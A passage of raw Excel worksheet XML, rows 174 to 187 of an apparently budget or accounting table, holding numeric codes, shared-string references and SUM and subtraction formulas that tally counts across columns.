      <c r="AP174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="18" customHeight="1" spans="1:42">
      <c r="A175" s="10">
        <v>1030425</v>
      </c>
      <c r="B175" s="16" t="s">
        <v>2784</v>
      </c>
      <c r="C175" s="17">
        <v>0</v>
      </c>
      <c r="D175" s="13">
        <v>2013199</v>
      </c>
      <c r="E175" s="16" t="s">
        <v>2785</v>
      </c>
      <c r="F175" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G175" s="17"/>
      <c r="H175" s="17"/>
      <c r="I175" s="17"/>
      <c r="J175" s="17"/>
      <c r="K175" s="17"/>
      <c r="L175" s="17"/>
      <c r="M175" s="17"/>
      <c r="N175" s="17"/>
      <c r="O175" s="17"/>
      <c r="P175" s="17"/>
      <c r="Q175" s="17"/>
      <c r="R175" s="17"/>
      <c r="S175" s="17"/>
      <c r="T175" s="17"/>
      <c r="U175" s="17"/>
      <c r="V175" s="17"/>
      <c r="W175" s="17"/>
      <c r="X175" s="17"/>
      <c r="Y175" s="17"/>
      <c r="Z175" s="17"/>
      <c r="AA175" s="17"/>
      <c r="AB175" s="17"/>
      <c r="AC175" s="17"/>
      <c r="AD175" s="17"/>
      <c r="AE175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AF175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AG175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AH175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AI175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AJ175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AK175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AL175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AM175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AN175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AO175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AP175" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
    </row>
    <row r="176" ht="18" customHeight="1" spans="1:42">
      <c r="A176" s="10">
        <v>1030426</v>
      </c>
      <c r="B176" s="16" t="s">
        <v>2786</v>
      </c>
      <c r="C176" s="17">
        <v>0</v>
      </c>
      <c r="D176" s="13">
        <v>20132</v>
      </c>
      <c r="E176" s="11" t="s">
        <v>2787</v>
      </c>
      <c r="F176" s="14">
        <f t="shared" si="43"/>
        <v>138</v>
      </c>
      <c r="G176" s="12">
        <f t="shared" ref="G176:R176" si="62">SUM(G177:G182)</f>
        <v>33</v>
      </c>
      <c r="H176" s="12">
        <f t="shared" si="62"/>
        <v>0</v>
      </c>
      <c r="I176" s="12">
        <f t="shared" si="62"/>
        <v>3</v>
      </c>
      <c r="J176" s="12">
        <f t="shared" si="62"/>
        <v>17</v>
      </c>
      <c r="K176" s="12">
        <f t="shared" si="62"/>
        <v>0</v>
      </c>
      <c r="L176" s="12">
        <f t="shared" si="62"/>
        <v>69</v>
      </c>
      <c r="M176" s="12">
        <f t="shared" si="62"/>
        <v>2</v>
      </c>
      <c r="N176" s="12">
        <f t="shared" si="62"/>
        <v>18</v>
      </c>
      <c r="O176" s="12">
        <f t="shared" si="62"/>
        <v>9</v>
      </c>
      <c r="P176" s="12">
        <f t="shared" si="62"/>
        <v>0</v>
      </c>
      <c r="Q176" s="12">
        <f t="shared" si="62"/>
        <v>9</v>
      </c>
      <c r="R176" s="12">
        <f t="shared" si="62"/>
        <v>11</v>
      </c>
      <c r="S176" s="12">
        <v>25</v>
      </c>
      <c r="T176" s="12">
        <v>0</v>
      </c>
      <c r="U176" s="12">
        <v>0</v>
      </c>
      <c r="V176" s="12">
        <v>17</v>
      </c>
      <c r="W176" s="12">
        <v>0</v>
      </c>
      <c r="X176" s="12">
        <v>66</v>
      </c>
      <c r="Y176" s="12">
        <v>2</v>
      </c>
      <c r="Z176" s="12">
        <v>17</v>
      </c>
      <c r="AA176" s="12">
        <v>9</v>
      </c>
      <c r="AB176" s="12">
        <v>0</v>
      </c>
      <c r="AC176" s="12">
        <v>0</v>
      </c>
      <c r="AD176" s="12">
        <v>0</v>
      </c>
      <c r="AE176" s="12">
        <f t="shared" ref="AE176:AP176" si="63">SUM(AE177:AE182)</f>
        <v>8</v>
      </c>
      <c r="AF176" s="12">
        <f t="shared" si="63"/>
        <v>0</v>
      </c>
      <c r="AG176" s="12">
        <f t="shared" si="63"/>
        <v>3</v>
      </c>
      <c r="AH176" s="12">
        <f t="shared" si="63"/>
        <v>0</v>
      </c>
      <c r="AI176" s="12">
        <f t="shared" si="63"/>
        <v>0</v>
      </c>
      <c r="AJ176" s="12">
        <f t="shared" si="63"/>
        <v>3</v>
      </c>
      <c r="AK176" s="12">
        <f t="shared" si="63"/>
        <v>0</v>
      </c>
      <c r="AL176" s="12">
        <f t="shared" si="63"/>
        <v>1</v>
      </c>
      <c r="AM176" s="12">
        <f t="shared" si="63"/>
        <v>0</v>
      </c>
      <c r="AN176" s="12">
        <f t="shared" si="63"/>
        <v>0</v>
      </c>
      <c r="AO176" s="12">
        <f t="shared" si="63"/>
        <v>9</v>
      </c>
      <c r="AP176" s="12">
        <f t="shared" si="63"/>
        <v>11</v>
      </c>
    </row>
    <row r="177" ht="18" customHeight="1" spans="1:42">
      <c r="A177" s="10">
        <v>1030427</v>
      </c>
      <c r="B177" s="16" t="s">
        <v>2788</v>
      </c>
      <c r="C177" s="17">
        <v>0</v>
      </c>
      <c r="D177" s="13">
        <v>2013201</v>
      </c>
      <c r="E177" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F177" s="14">
        <f t="shared" si="43"/>
        <v>2</v>
      </c>
      <c r="G177" s="17"/>
      <c r="H177" s="17"/>
      <c r="I177" s="17"/>
      <c r="J177" s="17"/>
      <c r="K177" s="17"/>
      <c r="L177" s="17"/>
      <c r="M177" s="17">
        <v>2</v>
      </c>
      <c r="N177" s="17"/>
      <c r="O177" s="17"/>
      <c r="P177" s="17"/>
      <c r="Q177" s="17"/>
      <c r="R177" s="17"/>
      <c r="S177" s="17"/>
      <c r="T177" s="17"/>
      <c r="U177" s="17"/>
      <c r="V177" s="17"/>
      <c r="W177" s="17"/>
      <c r="X177" s="17"/>
      <c r="Y177" s="17">
        <v>2</v>
      </c>
      <c r="Z177" s="17"/>
      <c r="AA177" s="17"/>
      <c r="AB177" s="17"/>
      <c r="AC177" s="17"/>
      <c r="AD177" s="17"/>
      <c r="AE177" s="17">
        <f t="shared" ref="AE177:AP182" si="64">G177-S177</f>
        <v>0</v>
      </c>
      <c r="AF177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AG177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AH177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AI177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AJ177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AK177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AL177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AM177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AN177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AO177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AP177" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
    </row>
    <row r="178" ht="18" customHeight="1" spans="1:42">
      <c r="A178" s="10">
        <v>1030429</v>
      </c>
      <c r="B178" s="16" t="s">
        <v>2789</v>
      </c>
      <c r="C178" s="17">
        <v>0</v>
      </c>
      <c r="D178" s="13">
        <v>2013202</v>
      </c>
      <c r="E178" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F178" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G178" s="17"/>
      <c r="H178" s="17"/>
      <c r="I178" s="17"/>
      <c r="J178" s="17"/>
      <c r="K178" s="17"/>
      <c r="L178" s="17"/>
      <c r="M178" s="17"/>
      <c r="N178" s="17"/>
      <c r="O178" s="17"/>
      <c r="P178" s="17"/>
      <c r="Q178" s="17"/>
      <c r="R178" s="17"/>
      <c r="S178" s="17"/>
      <c r="T178" s="17"/>
      <c r="U178" s="17"/>
      <c r="V178" s="17"/>
      <c r="W178" s="17"/>
      <c r="X178" s="17"/>
      <c r="Y178" s="17"/>
      <c r="Z178" s="17"/>
      <c r="AA178" s="17"/>
      <c r="AB178" s="17"/>
      <c r="AC178" s="17"/>
      <c r="AD178" s="17"/>
      <c r="AE178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AF178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AG178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AH178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AI178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AJ178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AK178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AL178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AM178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AN178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AO178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AP178" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
    </row>
    <row r="179" ht="18" customHeight="1" spans="1:42">
      <c r="A179" s="10">
        <v>1030430</v>
      </c>
      <c r="B179" s="16" t="s">
        <v>2790</v>
      </c>
      <c r="C179" s="17">
        <v>0</v>
      </c>
      <c r="D179" s="13">
        <v>2013203</v>
      </c>
      <c r="E179" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F179" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G179" s="17"/>
      <c r="H179" s="17"/>
      <c r="I179" s="17"/>
      <c r="J179" s="17"/>
      <c r="K179" s="17"/>
      <c r="L179" s="17"/>
      <c r="M179" s="17"/>
      <c r="N179" s="17"/>
      <c r="O179" s="17"/>
      <c r="P179" s="17"/>
      <c r="Q179" s="17"/>
      <c r="R179" s="17"/>
      <c r="S179" s="17"/>
      <c r="T179" s="17"/>
      <c r="U179" s="17"/>
      <c r="V179" s="17"/>
      <c r="W179" s="17"/>
      <c r="X179" s="17"/>
      <c r="Y179" s="17"/>
      <c r="Z179" s="17"/>
      <c r="AA179" s="17"/>
      <c r="AB179" s="17"/>
      <c r="AC179" s="17"/>
      <c r="AD179" s="17"/>
      <c r="AE179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AF179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AG179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AH179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AI179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AJ179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AK179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AL179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AM179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AN179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AO179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AP179" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
    </row>
    <row r="180" ht="18" customHeight="1" spans="1:42">
      <c r="A180" s="10">
        <v>1030431</v>
      </c>
      <c r="B180" s="16" t="s">
        <v>2791</v>
      </c>
      <c r="C180" s="17">
        <v>0</v>
      </c>
      <c r="D180" s="13">
        <v>2013204</v>
      </c>
      <c r="E180" s="16" t="s">
        <v>2792</v>
      </c>
      <c r="F180" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G180" s="17"/>
      <c r="H180" s="17"/>
      <c r="I180" s="17"/>
      <c r="J180" s="17"/>
      <c r="K180" s="17"/>
      <c r="L180" s="17"/>
      <c r="M180" s="17"/>
      <c r="N180" s="17"/>
      <c r="O180" s="17"/>
      <c r="P180" s="17"/>
      <c r="Q180" s="17"/>
      <c r="R180" s="17"/>
      <c r="S180" s="17"/>
      <c r="T180" s="17"/>
      <c r="U180" s="17"/>
      <c r="V180" s="17"/>
      <c r="W180" s="17"/>
      <c r="X180" s="17"/>
      <c r="Y180" s="17"/>
      <c r="Z180" s="17"/>
      <c r="AA180" s="17"/>
      <c r="AB180" s="17"/>
      <c r="AC180" s="17"/>
      <c r="AD180" s="17"/>
      <c r="AE180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AF180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AG180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AH180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AI180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AJ180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AK180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AL180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AM180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AN180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AO180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AP180" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
    </row>
    <row r="181" ht="18" customHeight="1" spans="1:42">
      <c r="A181" s="10">
        <v>1030432</v>
      </c>
      <c r="B181" s="16" t="s">
        <v>2793</v>
      </c>
      <c r="C181" s="17">
        <v>0</v>
      </c>
      <c r="D181" s="13">
        <v>2013250</v>
      </c>
      <c r="E181" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F181" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G181" s="17"/>
      <c r="H181" s="17"/>
      <c r="I181" s="17"/>
      <c r="J181" s="17"/>
      <c r="K181" s="17"/>
      <c r="L181" s="17"/>
      <c r="M181" s="17"/>
      <c r="N181" s="17"/>
      <c r="O181" s="17"/>
      <c r="P181" s="17"/>
      <c r="Q181" s="17"/>
      <c r="R181" s="17"/>
      <c r="S181" s="17"/>
      <c r="T181" s="17"/>
      <c r="U181" s="17"/>
      <c r="V181" s="17"/>
      <c r="W181" s="17"/>
      <c r="X181" s="17"/>
      <c r="Y181" s="17"/>
      <c r="Z181" s="17"/>
      <c r="AA181" s="17"/>
      <c r="AB181" s="17"/>
      <c r="AC181" s="17"/>
      <c r="AD181" s="17"/>
      <c r="AE181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AF181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AG181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AH181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AI181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AJ181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AK181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AL181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AM181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AN181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AO181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AP181" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
    </row>
    <row r="182" ht="18" customHeight="1" spans="1:42">
      <c r="A182" s="10">
        <v>103043208</v>
      </c>
      <c r="B182" s="16" t="s">
        <v>2794</v>
      </c>
      <c r="C182" s="17">
        <v>0</v>
      </c>
      <c r="D182" s="13">
        <v>2013299</v>
      </c>
      <c r="E182" s="16" t="s">
        <v>2795</v>
      </c>
      <c r="F182" s="14">
        <f t="shared" si="43"/>
        <v>136</v>
      </c>
      <c r="G182" s="17">
        <v>33</v>
      </c>
      <c r="H182" s="17"/>
      <c r="I182" s="17">
        <v>3</v>
      </c>
      <c r="J182" s="17">
        <v>17</v>
      </c>
      <c r="K182" s="17"/>
      <c r="L182" s="17">
        <v>69</v>
      </c>
      <c r="M182" s="17"/>
      <c r="N182" s="17">
        <v>18</v>
      </c>
      <c r="O182" s="17">
        <v>9</v>
      </c>
      <c r="P182" s="17"/>
      <c r="Q182" s="17">
        <v>9</v>
      </c>
      <c r="R182" s="17">
        <v>11</v>
      </c>
      <c r="S182" s="17">
        <v>25</v>
      </c>
      <c r="T182" s="17"/>
      <c r="U182" s="17"/>
      <c r="V182" s="17">
        <v>17</v>
      </c>
      <c r="W182" s="17"/>
      <c r="X182" s="17">
        <v>66</v>
      </c>
      <c r="Y182" s="17"/>
      <c r="Z182" s="17">
        <v>17</v>
      </c>
      <c r="AA182" s="17">
        <v>9</v>
      </c>
      <c r="AB182" s="17"/>
      <c r="AC182" s="17"/>
      <c r="AD182" s="17"/>
      <c r="AE182" s="17">
        <f t="shared" si="64"/>
        <v>8</v>
      </c>
      <c r="AF182" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AG182" s="17">
        <f t="shared" si="64"/>
        <v>3</v>
      </c>
      <c r="AH182" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AI182" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AJ182" s="17">
        <f t="shared" si="64"/>
        <v>3</v>
      </c>
      <c r="AK182" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AL182" s="17">
        <f t="shared" si="64"/>
        <v>1</v>
      </c>
      <c r="AM182" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AN182" s="17">
        <f t="shared" si="64"/>
        <v>0</v>
      </c>
      <c r="AO182" s="17">
        <f t="shared" si="64"/>
        <v>9</v>
      </c>
      <c r="AP182" s="17">
        <f t="shared" si="64"/>
        <v>11</v>
      </c>
    </row>
    <row r="183" ht="18" customHeight="1" spans="1:42">
      <c r="A183" s="10">
        <v>1030433</v>
      </c>
      <c r="B183" s="16" t="s">
        <v>2796</v>
      </c>
      <c r="C183" s="17">
        <v>0</v>
      </c>
      <c r="D183" s="13">
        <v>20133</v>
      </c>
      <c r="E183" s="11" t="s">
        <v>2797</v>
      </c>
      <c r="F183" s="14">
        <f t="shared" si="43"/>
        <v>16</v>
      </c>
      <c r="G183" s="12">
        <f t="shared" ref="G183:R183" si="65">SUM(G184:G189)</f>
        <v>0</v>
      </c>
      <c r="H183" s="12">
        <f t="shared" si="65"/>
        <v>0</v>
      </c>
      <c r="I183" s="12">
        <f t="shared" si="65"/>
        <v>0</v>
      </c>
      <c r="J183" s="12">
        <f t="shared" si="65"/>
        <v>0</v>
      </c>
      <c r="K183" s="12">
        <f t="shared" si="65"/>
        <v>0</v>
      </c>
      <c r="L183" s="12">
        <f t="shared" si="65"/>
        <v>16</v>
      </c>
      <c r="M183" s="12">
        <f t="shared" si="65"/>
        <v>0</v>
      </c>
      <c r="N183" s="12">
        <f t="shared" si="65"/>
        <v>0</v>
      </c>
      <c r="O183" s="12">
        <f t="shared" si="65"/>
        <v>0</v>
      </c>
      <c r="P183" s="12">
        <f t="shared" si="65"/>
        <v>0</v>
      </c>
      <c r="Q183" s="12">
        <f t="shared" si="65"/>
        <v>0</v>
      </c>
      <c r="R183" s="12">
        <f t="shared" si="65"/>
        <v>0</v>
      </c>
      <c r="S183" s="12">
        <v>0</v>
      </c>
      <c r="T183" s="12">
        <v>0</v>
      </c>
      <c r="U183" s="12">
        <v>0</v>
      </c>
      <c r="V183" s="12">
        <v>0</v>
      </c>
      <c r="W183" s="12">
        <v>0</v>
      </c>
      <c r="X183" s="12">
        <v>16</v>
      </c>
      <c r="Y183" s="12">
        <v>0</v>
      </c>
      <c r="Z183" s="12">
        <v>0</v>
      </c>
      <c r="AA183" s="12">
        <v>0</v>
      </c>
      <c r="AB183" s="12">
        <v>0</v>
      </c>
      <c r="AC183" s="12">
        <v>0</v>
      </c>
      <c r="AD183" s="12">
        <v>0</v>
      </c>
      <c r="AE183" s="12">
        <f t="shared" ref="AE183:AP183" si="66">SUM(AE184:AE189)</f>
        <v>0</v>
      </c>
      <c r="AF183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
      <c r="AG183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
      <c r="AH183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
      <c r="AI183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
      <c r="AJ183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
      <c r="AK183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
      <c r="AL183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
      <c r="AM183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
      <c r="AN183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
      <c r="AO183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
      <c r="AP183" s="12">
        <f t="shared" si="66"/>
        <v>0</v>
      </c>
    </row>
    <row r="184" ht="18" customHeight="1" spans="1:42">
      <c r="A184" s="10">
        <v>1030434</v>
      </c>
      <c r="B184" s="16" t="s">
        <v>2798</v>
      </c>
      <c r="C184" s="17">
        <v>0</v>
      </c>
      <c r="D184" s="13">
        <v>2013301</v>
      </c>
      <c r="E184" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F184" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G184" s="17"/>
      <c r="H184" s="17"/>
      <c r="I184" s="17"/>
      <c r="J184" s="17"/>
      <c r="K184" s="17"/>
      <c r="L184" s="17"/>
      <c r="M184" s="17"/>
      <c r="N184" s="17"/>
      <c r="O184" s="17"/>
      <c r="P184" s="17"/>
      <c r="Q184" s="17"/>
      <c r="R184" s="17"/>
      <c r="S184" s="17"/>
      <c r="T184" s="17"/>
      <c r="U184" s="17"/>
      <c r="V184" s="17"/>
      <c r="W184" s="17"/>
      <c r="X184" s="17"/>
      <c r="Y184" s="17"/>
      <c r="Z184" s="17"/>
      <c r="AA184" s="17"/>
      <c r="AB184" s="17"/>
      <c r="AC184" s="17"/>
      <c r="AD184" s="17"/>
      <c r="AE184" s="17">
        <f t="shared" ref="AE184:AP189" si="67">G184-S184</f>
        <v>0</v>
      </c>
      <c r="AF184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AG184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AH184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AI184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AJ184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AK184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AL184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AM184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AN184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AO184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AP184" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
    </row>
    <row r="185" ht="18" customHeight="1" spans="1:42">
      <c r="A185" s="10">
        <v>103043404</v>
      </c>
      <c r="B185" s="16" t="s">
        <v>2799</v>
      </c>
      <c r="C185" s="17">
        <v>0</v>
      </c>
      <c r="D185" s="13">
        <v>2013302</v>
      </c>
      <c r="E185" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F185" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G185" s="17"/>
      <c r="H185" s="17"/>
      <c r="I185" s="17"/>
      <c r="J185" s="17"/>
      <c r="K185" s="17"/>
      <c r="L185" s="17"/>
      <c r="M185" s="17"/>
      <c r="N185" s="17"/>
      <c r="O185" s="17"/>
      <c r="P185" s="17"/>
      <c r="Q185" s="17"/>
      <c r="R185" s="17"/>
      <c r="S185" s="17"/>
      <c r="T185" s="17"/>
      <c r="U185" s="17"/>
      <c r="V185" s="17"/>
      <c r="W185" s="17"/>
      <c r="X185" s="17"/>
      <c r="Y185" s="17"/>
      <c r="Z185" s="17"/>
      <c r="AA185" s="17"/>
      <c r="AB185" s="17"/>
      <c r="AC185" s="17"/>
      <c r="AD185" s="17"/>
      <c r="AE185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AF185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AG185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AH185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AI185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AJ185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AK185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AL185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AM185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AN185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AO185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AP185" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
    </row>
    <row r="186" ht="18" customHeight="1" spans="1:42">
      <c r="A186" s="10">
        <v>1030435</v>
      </c>
      <c r="B186" s="16" t="s">
        <v>2800</v>
      </c>
      <c r="C186" s="17">
        <v>0</v>
      </c>
      <c r="D186" s="13">
        <v>2013303</v>
      </c>
      <c r="E186" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F186" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G186" s="17"/>
      <c r="H186" s="17"/>
      <c r="I186" s="17"/>
      <c r="J186" s="17"/>
      <c r="K186" s="17"/>
      <c r="L186" s="17"/>
      <c r="M186" s="17"/>
      <c r="N186" s="17"/>
      <c r="O186" s="17"/>
      <c r="P186" s="17"/>
      <c r="Q186" s="17"/>
      <c r="R186" s="17"/>
      <c r="S186" s="17"/>
      <c r="T186" s="17"/>
      <c r="U186" s="17"/>
      <c r="V186" s="17"/>
      <c r="W186" s="17"/>
      <c r="X186" s="17"/>
      <c r="Y186" s="17"/>
      <c r="Z186" s="17"/>
      <c r="AA186" s="17"/>
      <c r="AB186" s="17"/>
      <c r="AC186" s="17"/>
      <c r="AD186" s="17"/>
      <c r="AE186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AF186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AG186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AH186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AI186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AJ186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AK186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AL186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AM186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AN186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AO186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="AP186" s="17">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
    </row>
    <row r="187" ht="18" customHeight="1" spans="1:42">
      <c r="A187" s="10">
        <v>1030440</v>
      </c>
      <c r="B187" s="16" t="s">
        <v>2801</v>
      </c>
      <c r="C187" s="17">
        <v>0</v>
      </c>
      <c r="D187" s="13">
        <v>2013304</v>
      </c>
      <c r="E187" s="16" t="s">
        <v>2802</v>
      </c>
      <c r="F187" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G187" s="17"/>
      <c r="H187" s="17"/>
      <c r="I187" s="17"/>
      <c r="J187" s="17"/>
      <c r="K187" s="17"/>
      <c r="L187" s="17"/>
      <c r="M187" s="17"/>
      <c r="N187" s="17"/>
      <c r="O187" s="17"/>
      <c r="P187" s="17"/>
      <c r="Q187" s="17"/>
      <c r="R187" s="17"/>
      <c r="S187" s="17"/>
      <c r="T187" s="17"/>
